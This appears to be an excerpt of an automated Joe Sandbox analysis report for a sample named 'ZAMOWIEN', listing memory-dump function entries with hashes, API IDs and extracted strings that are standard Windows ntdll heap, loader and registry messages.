                                                                                  • h.o7, xrefs: 3772A5D2
                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 376CD136
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 376CD263
                                                                                  • @, xrefs: 376CD2B3
                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 376CD0E6
                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 376CD202
                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 376CD06F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.o7
                                                                                  • API String ID: 0-3452320649
                                                                                  • Opcode ID: c31f1067cdfb6492c1ef25c688fa05fa0ec048795596f0ac3ceb7f83368071f8
                                                                                  • Instruction ID: 48f1ee1bb1b6e5bf7f763247cacdae051e81a3bfd0edfaec46e6754ce5ee909e
                                                                                  • Opcode Fuzzy Hash: c31f1067cdfb6492c1ef25c688fa05fa0ec048795596f0ac3ceb7f83368071f8
                                                                                  • Instruction Fuzzy Hash: 5EA16DB15083469FE321CF25C494B5BB7E8FB84765F01492EF998AA241E778D908CF93
                                                                                  APIs
                                                                                  • RtlDebugPrintTimes.NTDLL ref: 376FD879
                                                                                    • Part of subcall function 376D4779: RtlDebugPrintTimes.NTDLL ref: 376D4817
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-1975516107
                                                                                  • Opcode ID: 11a48fb3bf3df8ea0104723143912c7ec31f005e43c9b1cc996eb266f3c3bb5c
                                                                                  • Instruction ID: 486fd4fa87c4bbd83746b082a0c2ba6e117c3817c1a3d2aefd39910dcd0a0c79
                                                                                  • Opcode Fuzzy Hash: 11a48fb3bf3df8ea0104723143912c7ec31f005e43c9b1cc996eb266f3c3bb5c
                                                                                  • Instruction Fuzzy Hash: 6A51ED75A04346DFEB04CFA4C5A579EBBF1BF48364F604159C410BB282D77AA892CB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                  • API String ID: 0-2224505338
                                                                                  • Opcode ID: 01ee90c8ff631ef5440e61c303055700ff95be6a9459c867eeaaf317b563d276
                                                                                  • Instruction ID: 91a534bd203a4cbb784bf4cf101b604dab9fe1cc5d16544727f4f22a4c807da8
                                                                                  • Opcode Fuzzy Hash: 01ee90c8ff631ef5440e61c303055700ff95be6a9459c867eeaaf317b563d276
                                                                                  • Instruction Fuzzy Hash: F1514736211285EFDB01CF54CAA4F2AB3B9EF05A74F148899F415DF222CA35ED02DE56
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-523794902
                                                                                  • Opcode ID: 0481f425b113456d0a7ef0ae363d3df1356832e0ffe44dc0004fe67a30133260
                                                                                  • Instruction ID: 82a49bb431edd481d132ad3cd00ae62055e4bcdb93f1bab900b5f63eb4b36e31
                                                                                  • Opcode Fuzzy Hash: 0481f425b113456d0a7ef0ae363d3df1356832e0ffe44dc0004fe67a30133260
                                                                                  • Instruction Fuzzy Hash: 08422F76204382DFD305CF24C4A4B6ABBEAFF88654F0449ADE4A5CB351DB38E945CB52
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.o7
                                                                                  • API String ID: 0-3704603521
                                                                                  • Opcode ID: 307de3a2f14591b1035b78573a2b17a41f24f16e464681deae7df0299cc3f479
                                                                                  • Instruction ID: 38abec534e0cde7505da4527b28bd2d81c319578be2b6114d5640a7f4c981502
                                                                                  • Opcode Fuzzy Hash: 307de3a2f14591b1035b78573a2b17a41f24f16e464681deae7df0299cc3f479
                                                                                  • Instruction Fuzzy Hash: 5AF151B6D01219EFDB01CF98C9A4ADEBBB9FF48750F51406AE401EB211E7759E01CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-122214566
                                                                                  • Opcode ID: 113708d90220d08ef8c460c01a050719f02c1d2f05472795055892b55b77216f
                                                                                  • Instruction ID: 0639f486c1b5cf7f5f1695e5359a61bb44cb97f1729458f889fa4bd022a112ee
                                                                                  • Opcode Fuzzy Hash: 113708d90220d08ef8c460c01a050719f02c1d2f05472795055892b55b77216f
                                                                                  • Instruction Fuzzy Hash: 09C17771A033159FEB058B64C9A1FBE77A9AF05360F10406DE8059FA91EB74DC44CBB2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: 596a0a223fe33ade6a1bd36e7cd01acdb5fabdde7d5c8d5d76f51180cc303310
                                                                                  • Instruction ID: f7e751c004ffe38a7a3c9f041adc9da922b31f19559895e42e2fc4b8fb024324
                                                                                  • Opcode Fuzzy Hash: 596a0a223fe33ade6a1bd36e7cd01acdb5fabdde7d5c8d5d76f51180cc303310
                                                                                  • Instruction Fuzzy Hash: 78F1DF74602A0ADFEB05CF64C9A4B6AB7BAFF44350F2445A8E4059F781D734E981CFA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 3446177414-2283098728
                                                                                  • Opcode ID: c9b9601401501611523757b10e175e718925ef3c9d8bdce8f78baf99a305621f
                                                                                  • Instruction ID: 4fa873d93e5b1d2a978715de9d1d8cfc7440fc7d758ef45063894b452481713e
                                                                                  • Opcode Fuzzy Hash: c9b9601401501611523757b10e175e718925ef3c9d8bdce8f78baf99a305621f
                                                                                  • Instruction Fuzzy Hash: 6C5100716007029BE720DF38C8A4B2977A5BB89724F141A6DE461DB691DB7AE804CB93
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 475edec1a0adb28f3e93ad826340c499275b24eb2092822e3044f923d70aa069
                                                                                  • Instruction ID: 6ed0b115c5a68195de4e52a60a8bb817d754b6112002e72d2ba228d8dd25f64c
                                                                                  • Opcode Fuzzy Hash: 475edec1a0adb28f3e93ad826340c499275b24eb2092822e3044f923d70aa069
                                                                                  • Instruction Fuzzy Hash: 56F11772E006518FEB48CF68C8E567EFBF6AF88210B16466ED456DF394D634E901CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                  • API String ID: 0-3061284088
                                                                                  • Opcode ID: 843f10c42e584cf74235e590148a922954865ed983b62e81d12470ed56f78164
                                                                                  • Instruction ID: 83c8bab72a279b544a84000313ac25cdc287f47917ddc793e0c758932616d209
                                                                                  • Opcode Fuzzy Hash: 843f10c42e584cf74235e590148a922954865ed983b62e81d12470ed56f78164
                                                                                  • Instruction Fuzzy Hash: 0A017077054241AED305C328D479F527BACDB42B30F1948DDE4044F591CA58DC50F956
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LUj7$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                  • API String ID: 0-2549709445
                                                                                  • Opcode ID: e59d7d6c255e41f6f055d4dc415eb15d36f51007ae50a8911ea40017daf586c7
                                                                                  • Instruction ID: 38da2c8385b8c00cabbc6cd92fc9dfa9f7ccd686a8d634e45722afbc6b5083a5
                                                                                  • Opcode Fuzzy Hash: e59d7d6c255e41f6f055d4dc415eb15d36f51007ae50a8911ea40017daf586c7
                                                                                  • Instruction Fuzzy Hash: 6DB17AB5A12744CFEB24CE65C8A0BADB3B6AF48758F15492DE425EB792D730A8408F41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}k7
                                                                                  • API String ID: 0-2525425493
                                                                                  • Opcode ID: 5a7bee72e9374e7f0cf134185b3f9b0600b2eea56079f290a3e00408cd37ff47
                                                                                  • Instruction ID: ea937bae986be914b2d8852155bfae9ebbd4587816d8d2c5fe6691b9fffdcc0c
                                                                                  • Opcode Fuzzy Hash: 5a7bee72e9374e7f0cf134185b3f9b0600b2eea56079f290a3e00408cd37ff47
                                                                                  • Instruction Fuzzy Hash: F8817E75609340AFE311CB25C848B6ABBE9EF88764F40096DFD849F295DB74ED04CB62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LUj7$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                  • API String ID: 0-34927157
                                                                                  • Opcode ID: b2cf916098de5b6cbe3800d10502e3a1eb0ea924f64bf03a96d65d84e93c5721
                                                                                  • Instruction ID: e44e7a45190802cc04438f685db00630fbbfef6aadab92e6914863df227e58c7
                                                                                  • Opcode Fuzzy Hash: b2cf916098de5b6cbe3800d10502e3a1eb0ea924f64bf03a96d65d84e93c5721
                                                                                  • Instruction Fuzzy Hash: 1E91FF75A15309CFEB21CF64C4607ADB7B1EF04364F14459AE808AB395D778AE80CF91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                  • API String ID: 0-2586055223
                                                                                  • Opcode ID: cb40c96f8b9abfba48f1bd0ab7d75a0e49c80be096fc107513ac6de75b74b1b0
                                                                                  • Instruction ID: 5e17e6fdbc146c4d4c89446b1765fe9ad56a20af88afb76cf81bbbdfb2b69b0a
                                                                                  • Opcode Fuzzy Hash: cb40c96f8b9abfba48f1bd0ab7d75a0e49c80be096fc107513ac6de75b74b1b0
                                                                                  • Instruction Fuzzy Hash: F2614776204781EFE311CB65C858F6777EDEF89B60F0408A9F9649B291C778E840DB62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                  • API String ID: 2994545307-1391187441
                                                                                  • Opcode ID: d85174cfd160c704956fc04ae7088b6dd05fd0bcef5430597a79aa1922c19b6b
                                                                                  • Instruction ID: f24f611e9d259d3c74fea0ed864a4713a24a1ea7bc9957994285e271ee060372
                                                                                  • Opcode Fuzzy Hash: d85174cfd160c704956fc04ae7088b6dd05fd0bcef5430597a79aa1922c19b6b
                                                                                  • Instruction Fuzzy Hash: 0A31E676900205EFDB11CB54CC98F9AB7B8EF45770F1440A9E418AB2A1EB34ED40DFA2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$ep7
                                                                                  • API String ID: 0-1970619473
                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                  • Instruction ID: c6b523f11b45bf27451108b27eec8601f2fbe6e9b16b741295d7e5f8268623ed
                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                  • Instruction Fuzzy Hash: 1E317172A00619FBDB11CB94CC54EEEBBBDEB84760F004465F915AF260EB34DA05DBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                  • API String ID: 0-1880532218
                                                                                  • Opcode ID: 9023df3ba845d5ef7cdf8488e55b0c1c2f7432a8e27ef05e3a95afd92afd4957
                                                                                  • Instruction ID: f9b7463b841b78c8be76f85df64414972ba590ec38ed07170fe873d08cecbd72
                                                                                  • Opcode Fuzzy Hash: 9023df3ba845d5ef7cdf8488e55b0c1c2f7432a8e27ef05e3a95afd92afd4957
                                                                                  • Instruction Fuzzy Hash: 6421687AE01200ABD7158B58DC41B9AB7F6EF45765F044569E806AF341EB34DE06CB41
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 1bf6790120c162d35963a0a8172905ba4897cf987c061a7715631b287d75360a
                                                                                  • Instruction ID: 88fa52feb1179afd531fec8c1f5307ccc9ae77b57c350304312113ca184f2a95
                                                                                  • Opcode Fuzzy Hash: 1bf6790120c162d35963a0a8172905ba4897cf987c061a7715631b287d75360a
                                                                                  • Instruction Fuzzy Hash: 5C5103B4A10B05EFEB05CF68CC647ADB7B5BF44365F10816EE5029B290DB74A911CBD2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                  • API String ID: 0-3178619729
                                                                                  • Opcode ID: 0d00d89299881490e2ed265c69ac9a324a007ef419e0b2c5a278521c8ad07599
                                                                                  • Instruction ID: 6301b539b8765b6792c66c79c228a75b23cc4f6895aaab76f00cd004b5c65c5e
                                                                                  • Opcode Fuzzy Hash: 0d00d89299881490e2ed265c69ac9a324a007ef419e0b2c5a278521c8ad07599
                                                                                  • Instruction Fuzzy Hash: 192220B46013429FE706CF34C4A0B7ABBFAEF05754F148999E4458F682E735E981CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                  • API String ID: 0-1168191160
                                                                                  • Opcode ID: 333f5c4561cad08a4f5a88e9af06c11a948637c906486be25009dd0f1a5d9881
                                                                                  • Instruction ID: c9027a88967847fec923a8449657455cf915178a33cf2e54e3936b1b25505f03
                                                                                  • Opcode Fuzzy Hash: 333f5c4561cad08a4f5a88e9af06c11a948637c906486be25009dd0f1a5d9881
                                                                                  • Instruction Fuzzy Hash: 5BF1D7B5A003288BDB20CF14CC98BE9B3B5EF49758F4444E9E909AB245E7349EC5CF59
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 376D1632
                                                                                  • HEAP: , xrefs: 376D14B6
                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 376D1648
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                  • API String ID: 0-3178619729
                                                                                  • Opcode ID: 9e721dd0015294fad0e56c825098c8095b170470c2698a8a6a575387ffbf72d9
                                                                                  • Instruction ID: 386a5315d4fcd82a0d5a4da47711c88f88b7cfd0acc68613286109b95114e0a6
                                                                                  • Opcode Fuzzy Hash: 9e721dd0015294fad0e56c825098c8095b170470c2698a8a6a575387ffbf72d9
                                                                                  • Instruction Fuzzy Hash: BEE13274A143459FEB18CF68C4A0BBABBF2EF48310F15885DE496CB242E778E945CB50
                                                                                  Strings
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 377400F1
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 377400C7
                                                                                  • RTL: Re-Waiting, xrefs: 37740128
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: db7be21677b29beb085fea29a2f529016f70bbdbc43cb1bff338b9ac4392ae13
                                                                                  • Instruction ID: 7d143aea0439f1cbdf6b0a44f2a85adf6a0e81d8c9bb801d40d265575f148ede
                                                                                  • Opcode Fuzzy Hash: db7be21677b29beb085fea29a2f529016f70bbdbc43cb1bff338b9ac4392ae13
                                                                                  • Instruction Fuzzy Hash: 53E10E74608741DFE310CF28C894B5AB7E5BF88364F100A5DF4A49B2E1DB7AE944CB82
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                  • API String ID: 0-2391371766
